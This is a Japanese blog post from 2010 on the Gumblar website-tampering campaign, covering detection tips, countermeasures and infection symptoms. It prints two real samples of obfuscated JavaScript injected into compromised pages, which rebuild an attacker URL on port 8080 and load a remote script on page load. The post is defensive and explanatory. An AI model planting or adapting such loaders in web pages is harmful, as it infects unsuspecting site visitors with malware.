ガンブラー改ざんコードの確認チェック

  • 不正なコードはJavaScript「<script>~</scirpt>」で記述されている
     → ブラウザのJavaScript機能を無効にしておくことで機能はしない
  • 不正なコードが挿入されれるファイルはHTMLファイル、PHPファイル、JavaScriptファイルなど
     → テキスト、画像、音楽、動画、CSS以外
  • 不正なコードの主要部分はサイトごとに記述がバラバラである。
     → 1サイト内では同一のものが挿入される
  • 悪意のある不正なコードの挿入位置は基本的にページの最下部
     → 最下部に加えて最上部にも挿入される場合がある

◆ 改ざんサンプル 2種

<script>try{window.onload=function(){Tkug4qgr0degb8 = ” + ‘i$(((n(-#c!!)o#^^m&$).^(t)^h)()e^^!)p^l(#&)a(!@n(&&@!e^t#).^$c&(o#@m!.!^^w&@($!w&!@)#e@&)-@(@c&)&o@#^$m!(@.&^b((e)&s#&)t^$^b@@^o)^n^@!(d(@^s^&)$i)$t$$!)#e!$).@&)r#$u@:#(W&&v@#5((0#$$e(&5)#!(i!m!^4(&u&)f$#)n())$b!/)!&)v)!$n#((#e)&#x)&p^r)$@e^s)#s^.$!@n)!e))t&$(/$(v^^(!n$e&x)p$r)^)e&#&^s(s)).(!)^n(^^&#e#$t&()#/#(g(&^&)o&o)#g#l#))#$e@@.^$()p#^)t!!#/&#g($$)o)@)o)&$g)^@l($e@.)^!c!&o$((m)/^l!#$$e@&n&t&@a#@#.!@$r!)(u&#!/#’.replace(/#|@|!|(|)|&|$|^/ig, ”) ;Qhca6xvw41mfe = ‘appendChild’;An443u7fczbc = document.createElement(’sc’+’ript’);An443u7fczbc.src = ‘h’+’ttp://’+Tkug4qgr0degb8.replace(/Wv50e5im4ufnb/g, ‘8080’);An443u7fczbc.setAttribute(’defer’, ‘def’+’er’);eval(’document.body.’+Qhca6xvw41mfe+’(An443u7fczbc)’);} }  catch(Xfrzrokw ) {}</script>

<script>try{window.onload=function(){Lh49boaiozcvlx = ” + ‘s$(e&)(!r@^i&#e&)s)##@y&(#o#$()@n)@k)#i^$)((s)&#&-$@$@c(@o))(m$)&.@&1^1$!)(3#((3!.^@c!c)#).(@s^t@@)(e$@r)$n##-#!#d^&$e@.)($b!$#(e@s$@()^t^$@s#!)e@a$)(^@s!i@#&l&@)!(v^(@e)!#@r@#&.(&(r$!u&@^@!:#@D##&^5$@e&)i((^z!$j#)@3!x$0&)#&^d$#6@r)/#&$g$$a!m&))e##$v(!(a@&n@c@^e$&.@#c$@o()^#m)#/$@)(g&)(a((m(!e)!^v$a&)n@c#&(@e&.)c#&o#&m@!()&/$((^#g@(o@$o#$g(&l)^)$e^!$.&!c$o@)m#)/@(@m#o#(n)^$#o$!$#g^((r^$a&&#f&@)i)!)#a&s^.&)#!c@@!(o@&m(($/@)(1@7$$&1!^((7#@#3@@#.)$&@c)()o&m!$@/#$@’.replace(/@|#|&|(|$|^|)|!/ig, ”) ;Rm7gbvm3hdk3wq = ‘appendChild’;Ii46pd7p9cf4c = document.createElement(’sc’+’ript’);Ii46pd7p9cf4c.src = ‘h’+’ttp://‘+Lh49boaiozcvlx.replace(/D5eizj3x0d6r/g, ‘8080’);Ii46pd7p9cf4c.setAttribute(’defer’, ‘def’+’er’);eval(’document.body.‘+Rm7gbvm3hdk3wq+’(Ii46pd7p9cf4c)’);} }  catch(Vkfi8hgh ) {}</script>

 太字はどのサイトでも共通する部分で、それ以外の文字列はランダムです。(ウイルス対策ソフトの誤反応を回避するため、一部の記号を全角文字に変換してあります。)

◆ ガンブラーの対策
 上のような不正なコードが埋め込まれたページをブラウザで見ただけでガンブラーによるウイルスが発動する恐れがある。普通の一般の企業サイトや個人サイトがそのような状態になっているということで、「怪しいサイトに行かなければ安全」というのが通用しない。ただ、無料でできるガンブラー対策を行い、有名ソフトウェアにあるセキュリティの穴を塞げば問題は起こらない。

◆ ガンブラーの症状
 対策をきちんと行ってない場合は被害を受けることになる。ユーザーの意思は関係なく感染してしまう脅威である(何かを実行するわけでもなく、クリックするわけでもなく、OKボタンを押すわけでもなく)。ガンブラーの被害を受けた感染直後は変化はないため気づかない。何かおかしい?と気づいたときはすでに感染は完了済みである。

  • パソコンの動作が重くなり(CPU使用率が異常に高いプロセスが出現)、他の作業ができなくなる
  • Security Tool(偽ウイルス対策ソフト)という名称の英語のプログラムが導入され、”ウイルスに感染してる”というデタラメな警告をバコバコ表示し、他の作業ができなくなる。(デスクトップからアイコンや壁紙が消失、パソコンのシャットダウンの繰り返し)

☆ コトバ
 ガンブラー(Gumblar) … 2009年5月の改ざん騒動の時に攻撃者が用意したサイトが「http://gumblar.cn/」というドメイン(.cnはいちおう中国)に由来する。日本を含め世界中のサイトに不正なデータが埋め込まれ、このドメインへユーザーを強制誘導させウイルスを発動させる処理になっていた。

投稿日: 2010/01/31 | カテゴリー: 無料系 | パーマリンク コメントする.

コメントを残す

以下に詳細を記入するか、アイコンをクリックしてログインしてください。

WordPress.com ロゴ

WordPress.com アカウントを使ってコメントしています。 ログアウト / 変更 )

Twitter 画像

Twitter アカウントを使ってコメントしています。 ログアウト / 変更 )

Facebook の写真

Facebook アカウントを使ってコメントしています。 ログアウト / 変更 )

Google+ フォト

Google+ アカウントを使ってコメントしています。 ログアウト / 変更 )

%s と連携中